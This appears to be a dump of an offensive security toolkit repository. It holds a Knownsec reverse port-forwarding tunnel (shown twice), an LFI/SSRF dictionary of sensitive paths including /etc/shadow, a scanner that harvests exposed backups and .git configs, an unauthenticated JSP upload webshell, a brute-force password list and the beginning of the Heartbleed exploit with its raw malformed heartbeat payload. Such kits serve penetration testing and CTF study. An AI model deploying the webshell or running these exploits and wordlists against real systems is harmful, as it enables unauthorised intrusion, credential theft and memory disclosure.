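    firewall it or change the bind address for anything sensitive.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Without SO_REUSEADDR a restart while the old socket is in TIME_WAIT
    # fails with EADDRINUSE.
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(('0.0.0.0', port))
    srv.listen(1)
    while True:
        conn, addr = srv.accept()
        print("connected from: %s" % (addr,))
        streams[num] = conn  # publish our end
        s2 = _get_another_stream(num)  # wait for the other end
        _xstream(num, conn, s2)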
101 |
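def _connect(host, port, num):
    """Connect out to ``host:port`` and bridge it with the other endpoint.

    On failure sleeps 36 s and retries; after 200 failed attempts (~2 h) the
    slot is marked 'quit' so the waiting side exits, and None is returned.
    """
    not_connet_time = 0
    wait_time = 36
    try_cnt = 199  # attempts 0..199 -> 200 tries
    while True:
        if not_connet_time > try_cnt:
            streams[num] = 'quit'
            print('not connected')
            return None

        conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            conn.connect((host, port))
        except (socket.error, OSError):
            conn.close()  # the original leaked one socket per failed attempt
            print('can not connect %s:%s!' % (host, port))
            not_connet_time += 1
            time.sleep(wait_time)
            continue

        print("connected to %s:%i" % (host, port))
        streams[num] = conn  # publish our end
        s2 = _get_another_stream(num)  # wait for the other end
        _xstream(num, conn, s2)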
129 |
130 |
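if __name__ == '__main__':
    if len(sys.argv) != 3:
        _usage()
        sys.exit(1)
    tlist = []  # the two forwarder threads
    for i, spec in enumerate(sys.argv[1:3]):
        sl = spec.split(':')  # "l:port" or "c:host:port"
        try:
            if len(sl) == 2 and sl[0].lower() == 'l':
                t = threading.Thread(target=_server, args=(int(sl[1]), i))
            elif len(sl) == 3 and sl[0].lower() == 'c':
                t = threading.Thread(target=_connect, args=(sl[1], int(sl[2]), i))
            else:
                raise ValueError(spec)
        except ValueError:
            # Unknown stream form, or a non-numeric port — the original let
            # the latter escape as a traceback.
            _usage()
            sys.exit(1)
        tlist.append(t)

    for t in tlist:
        t.start()
    for t in tlist:
        t.join()
    sys.exit(0)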
155 |
--------------------------------------------------------------------------------
/dict/ssrf/config.dic:
--------------------------------------------------------------------------------
1 | /NetServer/bin/stable/apache/php.ini
2 | /PHP/php.ini
3 | /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
4 | /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
5 | /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
6 | /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
7 | /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
8 | /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
9 | /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
10 | /Volumes/webBackup/opt/apache2/conf/httpd.conf
11 | /Volumes/webBackup/private/etc/httpd/httpd.conf
12 | /Volumes/webBackup/private/etc/httpd/httpd.conf.default
13 | /apache/php/php.ini
14 | /bin/php.ini
15 | /etc/apache/conf/httpd.conf
16 | /etc/apache2/apache2.conf
17 | /etc/apache2/conf/httpd.conf
18 | /etc/apache2/httpd.conf
19 | /etc/chrootUsers
20 | /etc/ftpchroot
21 | /etc/ftphosts/etc/motd
22 | /etc/group
23 | /etc/http/conf/httpd.conf
24 | /etc/http/httpd.conf
25 | /etc/httpd.conf
26 | /etc/httpd/conf/httpd.conf
27 | /etc/httpd/httpd.conf
28 | /etc/httpd/php.ini
29 | /etc/issue
30 | /etc/logrotate.d/ftp
31 | /etc/logrotate.d/proftpd
32 | /etc/my.cnf
33 | /etc/mysql/my.cnf
34 | /etc/passwd
35 | /etc/php.ini
36 | /etc/php/apache/php.ini
37 | /etc/php/apache2/php.ini
38 | /etc/php/cgi/php.ini
39 | /etc/php/php.ini
40 | /etc/php/php4/php.ini
41 | /etc/php4.4/fcgi/php.ini
42 | /etc/php4/apache/php.ini
43 | /etc/php4/apache2/php.ini
44 | /etc/php4/cgi/php.ini
45 | /etc/php5/apache/php.ini
46 | /etc/php5/apache2/php.ini
47 | /etc/php5/cgi/php.ini
48 | /etc/proftp.conf
49 | /etc/proftpd/modules.conf
50 | /etc/protpd/proftpd.conf
51 | /etc/pure-ftpd.conf
52 | /etc/pure-ftpd/pure-ftpd.conf
53 | /etc/pure-ftpd/pure-ftpd.pdb
54 | /etc/pure-ftpd/pureftpd.pdb
55 | /etc/pureftpd.passwd
56 | /etc/pureftpd.pdb
57 | /etc/security/environ
58 | /etc/security/group
59 | /etc/security/limits
60 | /etc/security/passwd
61 | /etc/security/user
62 | /etc/shadow
63 | /etc/vhcs2/proftpd/proftpd.conf
64 | /etc/vsftpd.chroot_list
65 | /etc/vsftpd.conf
66 | /etc/vsftpd/vsftpd.conf
67 | /etc/wu-ftpd/ftphosts
68 | /etc/wu-ftpd/ftpusers
69 | /home/bin/stable/apache/php.ini
70 | /home2/bin/stable/apache/php.ini
71 | /opt/apache/conf/httpd.conf
72 | /opt/apache2/conf/httpd.conf
73 | /opt/xampp/etc/php.ini
74 | /php/php.ini
75 | /php4/php.ini
76 | /php5/php.ini
77 | /private/etc/httpd/httpd.conf
78 | /private/etc/httpd/httpd.conf.default
79 | /usr/apache/conf/httpd.conf
80 | /usr/apache2/conf/httpd.conf
81 | /usr/etc/pure-ftpd.conf
82 | /usr/lib/php.ini
83 | /usr/lib/php/php.ini
84 | /usr/lib/security/mkuser.default
85 | /usr/local/Zend/etc/php.ini
86 | /usr/local/apache/conf/httpd.conf
87 | /usr/local/apache/conf/php.ini
88 | /usr/local/apache/httpd.conf
89 | /usr/local/apache2/conf/httpd.conf
90 | /usr/local/apache2/httpd.conf
91 | /usr/local/apps/apache/conf/httpd.conf
92 | /usr/local/apps/apache2/conf/httpd.conf
93 | /usr/local/etc/apache/conf/httpd.conf
94 | /usr/local/etc/apache/vhosts.conf
95 | /usr/local/etc/apache2/conf/httpd.conf
96 | /usr/local/etc/httpd/conf/httpd.conf
97 | /usr/local/etc/php.ini
98 | /usr/local/etc/pure-ftpd.conf
99 | /usr/local/etc/pureftpd.pdb
100 | /usr/local/httpd/conf/httpd.conf
101 | /usr/local/lib/php.ini
102 | /usr/local/php/httpd.conf
103 | /usr/local/php/httpd.conf.php
104 | /usr/local/php/lib/php.ini
105 | /usr/local/php4/httpd.conf
106 | /usr/local/php4/httpd.conf.php
107 | /usr/local/php4/lib/php.ini
108 | /usr/local/php5/httpd.conf
109 | /usr/local/php5/httpd.conf.php
110 | /usr/local/php5/lib/php.ini
111 | /usr/local/pureftpd/etc/pure-ftpd.conf
112 | /usr/local/pureftpd/etc/pureftpd.pdb
113 | /usr/local/pureftpd/sbin/pure-config.pl
114 | /usr/pkgsrc/net/pureftpd/
115 | /usr/ports/contrib/pure-ftpd/
116 | /usr/ports/net/pure-ftpd/
117 | /usr/sbin/pure-config.pl
118 | /var/lib/mysql/my.cnf
119 | /var/local/www/conf/php.ini
120 | /var/www/conf/httpd.conf
121 | /web/conf/php.ini
122 | /xampp/apache/bin/php.ini
123 |
--------------------------------------------------------------------------------
/tools/vi_vim_scan_and_download.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # __Author__: Byblue
3 | # __Change__: Virink
4 |
5 | import time
6 | import urllib
7 | import urllib2
8 |
9 |
interval = 1  # seconds to sleep between requests

# site -> script type (a key of `script` below)
websites = {
    "http://web.l-ctf.com:55533": "php"
}
# Candidate file names per script type (each value is a set literal).
# NOTE(review): only the "general" entries start with '/'; main() builds URLs
# as website + name, so every other entry needs a '/' supplied by the caller.
script = {
    "general": {
        "/robots.txt", "/install.txt", "/password.txt", "/readme.txt", "/sql.txt", "/Password.txt", "/ReadMe.txt",
        "/www.rar", "/wwwroot.rar", "/webroot.rar", "/backup.rar",
        "/www.zip", "/wwwroot.zip", "/webroot.zip", "/backup.zip",
        "/DS_Store", "/.DS_Store", "/.svn/entries", "/.htaccess", "/.git/config"
    },
    "php": {
        "index.php",
        "config.php"
    },
    "jsp": {
        "index.jsp",
        "config.jsp"
    },
    "asp": {
        "index.asp",
        "config.asp"
    },
    "aspx": {
        "index.aspx",
        "config.aspx"
    },
    "discuz": {
        "config/config_global.php",  # discuz
        "config/config_ucenter.php",  # discuz
        "uc_server/data/config.inc.php"  # discuz
    },
    "dede": {
        "data/common.inc.php",  # dede old version
        "include/config_base.php"  # dede new version
    },
    "qibo": {
        "data/mysql_config.php"  # qibo
    },
    "thinkphp": {
        "Common/Conf/config.php"  # thinkphp
    }
}
54 |
55 |
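def getScriptConfig(sc):
    """Return the file set for script type ``sc``, or the 'php' set if unknown.

    ``dict.has_key`` (the original) does not exist on Python 3; ``get`` with
    a default is equivalent on both versions.
    """
    return script.get(sc, script['php'])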
61 |
62 |
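def downLoad(fileUrl, path="./downloads/"):
    """Fetch ``fileUrl`` into ``path`` as ``<host>_<basename>``.

    Any error (HTTP 404, connection refused, ...) is printed, not raised, so
    the caller's sweep keeps going.  Changes from the original: the response
    is read once and written out (it used to urlopen() as a probe, leak that
    response, then download the file a second time with urlretrieve), and
    the download directory is created on demand instead of failing silently
    when it does not exist.
    """
    import os
    try:
        resp = urllib2.urlopen(fileUrl)  # raises on HTTP errors -> skipped
        try:
            body = resp.read()
        finally:
            resp.close()
        fName = fileUrl.split('/').pop()
        print("Downloading: %s " % (fName,))
        start = fileUrl.find('://') + 3
        end = fileUrl.find('/', start)
        host = fileUrl[start:end]
        if not os.path.isdir(path):
            os.makedirs(path)
        with open(path + host + "_" + fName, "wb") as fh:
            fh.write(body)
    except Exception as e:
        print("[+]%s----%s" % (fileUrl, e))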
75 |
76 |
def usage():
    """Placeholder: the tool takes no command-line options."""
    print("no usage.")
79 |
80 |
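def main():
    """Sweep every configured site for leftover files.

    Pass 1 requests the 'general' names (robots, archives, VCS metadata)
    as-is — they already start with '/'.  Pass 2 takes the site's
    script-type file list and requests the editor leftovers ``name.bak``,
    ``name~`` and ``.name.swp`` (vim swap file) for each.

    The original read ``vimBackup`` before ever assigning it (NameError on
    the first iteration), joined ``website + "index.php"`` with no '/'
    between them, and wrapped everything in a ``while True`` that broke
    after one round; this does one round with those fixed.
    """
    def variants(base):
        # "http://host/dir/name" -> name.bak, name~ and vim's .name.swp
        idx = base.rfind('/')
        head, name = base[:idx], base[idx + 1:]
        return (head + "/" + name + ".bak",
                head + "/" + name + "~",
                head + "/." + name + ".swp")

    for website in websites.keys():
        for backup in getScriptConfig('general'):
            downLoad(website + backup)
            time.sleep(interval)

        for name in getScriptConfig(websites[website]):
            if not name.startswith('/'):
                name = '/' + name
            for url in variants(website + name):
                downLoad(url)
                time.sleep(interval)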
if __name__ == "__main__":
    started = time.time()
    main()
    finished = time.time()  # elapsed time is measured but never printed
125 |
--------------------------------------------------------------------------------
/webshell/jsp/up.jsp:
--------------------------------------------------------------------------------
1 |
2 | <%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
3 | <%
4 | //
5 | // JSP_KIT
6 | //
7 | // up.jsp = File Upload (unix)
8 | //
9 | // by: Unknown
10 | // modified: 27/06/2003
11 | //
12 | %>
13 |
14 |
18 |
19 | <%!
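// Copies every request header into prop (names lower-cased) and returns the
// multipart boundary taken from Content-Type, or null if there is none.
// The local was named `enum` in the original; that has been a reserved word
// since Java 5 and fails to compile on any current container.
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
    String boundary = null;
    Enumeration headerNames = request.getHeaderNames();
    while(headerNames.hasMoreElements()){
        String header = (String)headerNames.nextElement();
        String hvalue = request.getHeader(header);
        prop.setProperty((header).toLowerCase(),hvalue);
        if("content-type".equalsIgnoreCase(header) ){
            int idx = hvalue.lastIndexOf("boundary=");
            if(idx != -1 ){
                boundary= hvalue.substring(idx+9 , hvalue.length());
            }
        }
    }
    return boundary;
}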
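// Extracts the bare file name from a multipart Content-Disposition line,
// e.g.  form-data; name="f"; filename="C:\dir\x.txt"  ->  x.txt
// Returns null when there is no filename= token.  Only the part after the
// last slash/backslash is kept, so a client-supplied path cannot walk out
// of DPATH — but the client still picks the name, including names of files
// that already exist there.
public String getFileName(String secondline){
    int len = secondline.length();
    int idx = secondline.lastIndexOf("filename=");
    if(idx == -1 ) return null;
    // idx+10 skips `filename="`, len-1 drops the closing quote.  A bare or
    // unquoted value made the original throw StringIndexOutOfBoundsException.
    if(idx + 10 > len - 1) return null;
    String filename = secondline.substring(idx+10 , len-1);
    filename = filename.replace('\\','/');
    idx = filename.lastIndexOf("/");
    idx = idx + 1;
    filename = filename.substring( idx );
    return filename;
}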
48 | %>
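<%
// Minimal multipart/form-data receiver: stores the first uploaded part under
// DPATH with the client-supplied name and prints its name and size.
// There is no authentication at all — anyone who can reach this page can
// write files into DPATH.
// NOTE(review): `prop` is used below but not declared anywhere visible in
// this listing (lines 15-17 are missing); confirm the original declares it.
String DPATH = "/tmp/";
int ROUGHSIZE = 640000; // BUG (original note): cuts the file if it is larger than 640 KB
int MAXSIZE = 10; // 10 Mega Byte
String boundary = getBoundary(request,prop);
if(boundary == null ){
    boundary = prop.getProperty("boundary");
}else{
    boundary = "--"+boundary;
}
if(boundary == null ){
    return;
}
Long contentsize = new Long(prop.getProperty("content-length","0"));
int c;
StringWriter st = new StringWriter();
if(contentsize.longValue() < 1L ){
    return;
}
long l = contentsize.longValue() - ROUGHSIZE;
int KB = 1024;
int MB = 1024 * KB;
int csize = (int)(l / MB);
if(csize > MAXSIZE ){
    return;
}
ServletInputStream fin = request.getInputStream();
int cn;
int count=0;
// First line of the body must be the boundary.
while((c=fin.read()) != -1 ){
    if( c == '\r') break;
    st.write(c);
    count++;
}
c=fin.read();
String tboundary = st.getBuffer().toString();
tboundary=tboundary.trim();
if(! tboundary.equalsIgnoreCase( boundary) ){
    return;
}
st.close();
st = null;
st = new StringWriter();
// Second line: Content-Disposition with the file name.
while((c=fin.read()) != -1 ){
    if( c == '\r' ) break;
    st.write(c);
}
c=fin.read();
String secondline = st.getBuffer().toString();
String filename = getFileName(secondline);
st.close();
st = null;
st = new StringWriter();
// Third line (Content-Type) is skipped; the two reads after it eat the
// blank-line CRLF that precedes the part body.
while((c=fin.read()) != -1 ){
    if( c == '\r' ) break;
    st.write( c );
}
c=fin.read();

fin.read();
fin.read();
File newfile = null;
FileOutputStream fout =null;
try{
    if(filename == null) throw new FileNotFoundException("File Name not found");
    newfile = new File(DPATH+filename);
    fout = new FileOutputStream( newfile );
}catch(FileNotFoundException fnexp){
    fin.close();
    return;
}

byte b[] = null;
// InputStream.read() may return fewer bytes than asked for.  The original
// ignored the count, wrote the whole 1024-byte buffer (padding the file
// with stale bytes on a short read) and never noticed end-of-stream.
while(l > 1024L){
    b = new byte[1024];
    int n = fin.read(b,0,1024);
    if(n == -1) break;
    fout.write(b,0,n);
    b=null;
    l -= n;
}
while(l > 0){
    b = new byte[(int)l];
    int n = fin.read(b,0,(int)l);
    if(n == -1) break;
    fout.write(b,0,n);
    l -= n;
}


// The remainder (roughly the last ROUGHSIZE bytes) holds the tail of the
// file followed by the closing boundary; keep what precedes the boundary.
ByteArrayOutputStream baos = new ByteArrayOutputStream();
while((c = fin.read()) != -1){
    baos.write(c);
}
String laststring = baos.toString();
int idx = laststring.indexOf(boundary);
b = baos.toByteArray();
if(idx > 2){
    fout.write(b,0,idx-2);
}else{
    fout.close();
    fin.close();
    newfile.delete();
    return;
}
fout.flush();
fout.close();
fin.close();

out.println("FileName: " + newfile.getName());
out.println("FileSize: " + newfile.length());

%>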
158 |
159 |
160 |
161 |
162 |
163 |
--------------------------------------------------------------------------------
/tools/rtcp.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding=utf-8
3 |
4 | '''
5 | filename:rtcp.py
6 | @desc:
7 | 利用python的socket端口转发,用于远程维护
8 | 如果连接不到远程,会sleep 36s,最多尝试200(即两小时)
9 |
10 | @usage:
11 | ./rtcp.py stream1 stream2
12 | stream为:l:port或c:host:port
13 | l:port表示监听指定的本地端口
14 | c:host:port表示主动连接远程主机 host 的指定端口(不是监听;连不上会按上面说的间隔重试)
15 |
16 | @author: watercloud, zd, knownsec team
17 | @web: www.knownsec.com, blog.knownsec.com
18 | @date: 2009-7
19 | '''
20 |
21 | import socket
22 | import sys
23 | import threading
24 | import time
25 |
# The two endpoints whose traffic gets spliced together. Each slot holds a
# connected socket object, None while that side is still waiting, or the
# string 'quit' once the connecting side has given up.
streams = [None] * 2
# Trace switch for the per-chunk messages in _xstream (0 = silent, 1 = trace).
debug = 1
28 |
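def _usage():
    """Print the command-line synopsis to stdout.

    Uses the function form of print (valid on Python 2 and 3); the original
    print statement is a SyntaxError on Python 3.
    """
    print("Usage: ./rtcp.py stream1 stream2\nstream : l:port or c:host:port")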
31 |
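def _get_another_stream(num):
    """Return the peer socket for stream *num*, blocking until it exists.

    Args:
        num: index (0 or 1) of the caller's own slot in ``streams``; the peer
            is the other slot.

    Returns:
        The object stored in the peer slot once it is no longer None.

    Raises:
        ValueError: if *num* is not 0 or 1. (The original raised a bare
            string, which is itself a TypeError at runtime on Python 2.6+/3.)
        SystemExit: if the peer side gave up and left ``'quit'`` in its slot.
    """
    if num not in (0, 1):
        raise ValueError("ERROR")
    peer = 1 - num
    while True:
        other = streams[peer]
        if other == 'quit':
            print("can't connect to the target, quit now!")
            sys.exit(1)
        if other is not None:
            return other
        # The sockets are filled in from the other thread; poll once a second.
        time.sleep(1)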
52 |
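def _xstream(num, s1, s2):
    """Pump bytes from *s1* to *s2* until either side closes, then tear both down.

    Args:
        num: stream index of the caller (0 or 1); only used to label the trace
            output so the two pump threads can be told apart.
        s1: socket to read from.
        s2: socket to write to.

    Side effects:
        Both sockets are shut down and closed, both ``streams`` slots are reset
        to None so the listener/connector loops can take a new pair, and a
        trace line is printed when ``debug`` is non-zero.
    """
    try:
        while True:
            # recv blocks until data arrives or the peer fully closes; a
            # shutdown() on the peer is the quickest way to make it return.
            chunk = s1.recv(1024)
            if debug > 0:
                print("%s recv" % num)
            if not chunk:
                # Zero-length read: the peer closed its side.
                print("%s one closed" % num)
                break
            s2.sendall(chunk)
            if debug > 0:
                print("%s sendall" % num)
    except Exception:
        # Any socket error ends the pump. Unlike the original bare except,
        # KeyboardInterrupt/SystemExit still propagate.
        print("%s one connect closed." % num)

    for sock in (s1, s2):
        try:
            sock.shutdown(socket.SHUT_RDWR)
            sock.close()
        except Exception:
            pass  # already closed by the other pump thread; best effort

    streams[0] = None
    streams[1] = None
    print("%s CLOSED" % num)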
88 |
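def _server(port, num):
    """Listen on *port* (all interfaces) and pump each accepted connection.

    Args:
        port: local TCP port to bind.
        num: stream index (0 or 1) of this endpoint in ``streams``.

    Never returns: after one forwarded session ends it goes back to accept().

    NOTE(review): the listener binds 0.0.0.0 with no authentication, so
    anyone who can reach the port gets the other end of the tunnel; restrict
    it with a firewall or bind a specific interface when used on a shared host.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(('0.0.0.0', port))
    listener.listen(1)
    while True:
        conn, addr = listener.accept()
        print("connected from: %s" % (addr,))
        streams[num] = conn              # publish our end
        peer = _get_another_stream(num)  # wait for the other end
        _xstream(num, conn, peer)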
103 |
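def _connect(host, port, num):
    """Connect out to host:port (retrying) and pump the connection.

    Args:
        host: remote host name or IP.
        port: remote TCP port.
        num: stream index (0 or 1) of this endpoint in ``streams``.

    Retries every 36 s, up to 200 attempts (about two hours). After the last
    failure the slot is set to 'quit' so the waiting peer thread exits, and
    None is returned. On success this never returns normally: once the
    forwarded session ends it reconnects.
    """
    wait_time = 36
    max_attempts = 200
    failures = 0
    while True:
        if failures >= max_attempts:
            streams[num] = 'quit'
            print('not connected')
            return None

        conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            conn.connect((host, port))
        except Exception:
            # Release the failed socket instead of leaking one per attempt.
            conn.close()
            print('can not connect %s:%s!' % (host, port))
            failures += 1
            time.sleep(wait_time)
            continue

        print("connected to %s:%i" % (host, port))
        streams[num] = conn
        peer = _get_another_stream(num)
        _xstream(num, conn, peer)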
131 |
132 |
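if __name__ == '__main__':
    if len(sys.argv) != 3:
        _usage()
        sys.exit(1)
    workers = []  # one thread per endpoint
    for idx, spec in enumerate(sys.argv[1:3]):
        parts = spec.split(':')  # "l:port" or "c:host:port"
        kind = parts[0].lower()
        try:
            if kind == 'l' and len(parts) == 2:
                thread = threading.Thread(target=_server, args=(int(parts[1]), idx))
            elif kind == 'c' and len(parts) == 3:
                thread = threading.Thread(target=_connect, args=(parts[1], int(parts[2]), idx))
            else:
                raise ValueError(spec)
        except ValueError:
            # Wrong shape or a non-numeric port: show usage, not a traceback.
            _usage()
            sys.exit(1)
        workers.append(thread)

    for thread in workers:
        thread.start()
    for thread in workers:
        thread.join()
    sys.exit(0)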
157 |
--------------------------------------------------------------------------------
/dict/password/twitter.txt:
--------------------------------------------------------------------------------
1 | 111111
2 | 11111111
3 | 112233
4 | 121212
5 | 123123
6 | 123456
7 | 1234567
8 | 12345678
9 | 131313
10 | 232323
11 | 654321
12 | 666666
13 | 696969
14 | 777777
15 | 7777777
16 | 8675309
17 | 987654
18 | aaaaaa
19 | abc123
20 | abc123
21 | abcdef
22 | abgrtyu
23 | access
24 | access14
25 | action
26 | albert
27 | alexis
28 | amanda
29 | amateur
30 | andrea
31 | andrew
32 | angela
33 | angels
34 | animal
35 | anthony
36 | apollo
37 | apples
38 | arsenal
39 | arthur
40 | asdfgh
41 | asdfgh
42 | ashley
43 | august
44 | austin
45 | badboy
46 | bailey
47 | banana
48 | barney
49 | baseball
50 | batman
51 | beaver
52 | beavis
53 | bigdaddy
54 | bigdog
55 | birdie
56 | bitches
57 | biteme
58 | blazer
59 | blonde
60 | blondes
61 | bond007
62 | bonnie
63 | booboo
64 | booger
65 | boomer
66 | boston
67 | brandon
68 | brandy
69 | braves
70 | brazil
71 | bronco
72 | broncos
73 | bulldog
74 | buster
75 | butter
76 | butthead
77 | calvin
78 | camaro
79 | cameron
80 | canada
81 | captain
82 | carlos
83 | carter
84 | casper
85 | charles
86 | charlie
87 | cheese
88 | chelsea
89 | chester
90 | chicago
91 | chicken
92 | cocacola
93 | coffee
94 | college
95 | compaq
96 | computer
97 | cookie
98 | cooper
99 | corvette
100 | cowboy
101 | cowboys
102 | crystal
103 | dakota
104 | dallas
105 | daniel
106 | danielle
107 | debbie
108 | dennis
109 | diablo
110 | diamond
111 | doctor
112 | doggie
113 | dolphin
114 | dolphins
115 | donald
116 | dragon
117 | dreams
118 | driver
119 | eagle1
120 | eagles
121 | edward
122 | einstein
123 | erotic
124 | extreme
125 | falcon
126 | fender
127 | ferrari
128 | firebird
129 | fishing
130 | florida
131 | flower
132 | flyers
133 | football
134 | forever
135 | freddy
136 | freedom
137 | gandalf
138 | gateway
139 | gators
140 | gemini
141 | george
142 | giants
143 | ginger
144 | golden
145 | golfer
146 | gordon
147 | gregory
148 | guitar
149 | gunner
150 | hammer
151 | hannah
152 | hardcore
153 | harley
154 | heather
155 | helpme
156 | hockey
157 | hooters
158 | horney
159 | hotdog
160 | hunter
161 | hunting
162 | iceman
163 | iloveyou
164 | internet
165 | iwantu
166 | jackie
167 | jackson
168 | jaguar
169 | jasmine
170 | jasper
171 | jennifer
172 | jeremy
173 | jessica
174 | johnny
175 | johnson
176 | jordan
177 | joseph
178 | joshua
179 | junior
180 | justin
181 | killer
182 | knight
183 | ladies
184 | lakers
185 | lauren
186 | leather
187 | legend
188 | letmein
189 | little
190 | london
191 | lovers
192 | maddog
193 | madison
194 | maggie
195 | magnum
196 | marine
197 | marlboro
198 | martin
199 | marvin
200 | master
201 | matrix
202 | matthew
203 | maverick
204 | maxwell
205 | melissa
206 | member
207 | mercedes
208 | merlin
209 | michael
210 | michelle
211 | mickey
212 | midnight
213 | miller
214 | mistress
215 | monica
216 | monkey
217 | monkey
218 | monster
219 | morgan
220 | mother
221 | mountain
222 | muffin
223 | murphy
224 | mustang
225 | naked
226 | nascar
227 | nathan
228 | naughty
229 | ncc1701
230 | newyork
231 | nicholas
232 | nicole
233 | nipple
234 | nipples
235 | oliver
236 | orange
237 | packers
238 | panther
239 | panties
240 | parker
241 | password
242 | password
243 | password1
244 | password12
245 | password123
246 | patrick
247 | peaches
248 | peanut
249 | pepper
250 | phantom
251 | phoenix
252 | player
253 | please
254 | pookie
255 | porsche
256 | prince
257 | princess
258 | private
259 | purple
260 | pussies
261 | qazwsx
262 | qwerty
263 | qwertyui
264 | rabbit
265 | rachel
266 | racing
267 | raiders
268 | rainbow
269 | ranger
270 | rangers
271 | rebecca
272 | redskins
273 | redsox
274 | redwings
275 | richard
276 | robert
277 | rocket
278 | rosebud
279 | runner
280 | rush2112
281 | russia
282 | samantha
283 | sammy
284 | samson
285 | sandra
286 | saturn
287 | scooby
288 | scooter
289 | scorpio
290 | scorpion
291 | secret
292 | sexsex
293 | shadow
294 | shannon
295 | shaved
296 | sierra
297 | silver
298 | skippy
299 | slayer
300 | smokey
301 | snoopy
302 | soccer
303 | sophie
304 | spanky
305 | sparky
306 | spider
307 | squirt
308 | srinivas
309 | startrek
310 | starwars
311 | steelers
312 | steven
313 | sticky
314 | stupid
315 | success
316 | summer
317 | sunshine
318 | superman
319 | surfer
320 | swimming
321 | sydney
322 | taylor
323 | tennis
324 | teresa
325 | tester
326 | testing
327 | theman
328 | thomas
329 | thunder
330 | thx1138
331 | tiffany
332 | tigers
333 | tigger
334 | tomcat
335 | topgun
336 | toyota
337 | travis
338 | trouble
339 | trustno1
340 | tucker
341 | turtle
342 | twitter
343 | united
344 | vagina
345 | victor
346 | victoria
347 | viking
348 | voodoo
349 | voyager
350 | walter
351 | warrior
352 | welcome
353 | whatever
354 | william
355 | willie
356 | wilson
357 | winner
358 | winston
359 | winter
360 | wizard
361 | xavier
362 | xxxxxx
363 | xxxxxxxx
364 | yamaha
365 | yankee
366 | yankees
367 | yellow
368 | zxcvbn
369 | zxcvbnm
370 | zzzzzz
371 |
--------------------------------------------------------------------------------
/tools/ssltest.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
4 | # The author disclaims copyright to this source code.
5 |
import binascii
import re
import select
import socket
import struct
import sys
import time
from optparse import OptionParser
13 |
# Command line: one positional server argument plus an optional port.
options = OptionParser(
    usage='%prog server [options]',
    description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option(
    '-p', '--port', type='int', default=443,
    help='TCP port to test (default: 443)')
16 |
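def h2bin(x):
    """Decode a whitespace-separated hex dump into raw bytes.

    Args:
        x: string of hex digit pairs; spaces and newlines are ignored.

    Returns:
        The decoded bytes (``str`` on Python 2, ``bytes`` on Python 3).
    """
    # binascii.unhexlify exists on both Python 2 and 3; the original
    # str.decode('hex') is Python 2 only.
    return binascii.unhexlify(x.replace(' ', '').replace('\n', ''))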
19 |
# TLS ClientHello, sent as one record: type 0x16 (handshake), version 0x0302
# (TLS 1.1), length 0xdc. It carries a long cipher-suite list and ends with
# what looks like the heartbeat extension (type 0x000f, mode 01) so the
# server agrees to process heartbeat messages. Keep the bytes exactly as
# published; do not reflow them by hand.
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

# Malformed heartbeat: record type 0x18, record length 3, then message type
# 01 (request) with a declared payload length of 0x4000 and no payload at
# all. A vulnerable server answers with up to 16 KiB of its memory; a fixed
# one ignores it or replies with an alert (see the classification in hit_hb,
# which treats anything beyond 3 returned bytes as a leak).
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
42 |
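def hexdump(s):
    """Print *s* as 16-byte rows: offset, hex bytes, printable ASCII.

    Works on Python 2 ``str`` and Python 3 ``bytes`` alike by iterating a
    ``bytearray`` (the original called ord() on each element, which fails on
    Python 3 where iterating bytes already yields ints). A blank line is
    printed after the dump.

    Args:
        s: the byte string to dump.
    """
    data = bytearray(s)
    for off in range(0, len(data), 16):
        row = data[off:off + 16]
        hx = ' '.join('%02X' % b for b in row)
        txt = ''.join(chr(b) if 32 <= b <= 126 else '.' for b in row)
        print(' %04x: %-48s %s' % (off, hx, txt))
    print('')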
50 |
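def recvall(s, length, timeout=5):
    """Read exactly *length* bytes from socket *s* within *timeout* seconds.

    Args:
        s: connected socket.
        length: number of bytes wanted.
        timeout: overall deadline in seconds for the whole read.

    Returns:
        The bytes read, or None on EOF or when the deadline passes first.
    """
    endtime = time.time() + timeout
    rdata = b''  # bytes literal so concatenation also works on Python 3
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        # Bound the wait by the time actually left; the original always
        # waited up to 5 s here regardless of *timeout*.
        r, w, e = select.select([s], [], [], rtime)
        if s in r:
            data = s.recv(remain)
            if not data:
                # EOF before the whole record arrived.
                return None
            rdata += data
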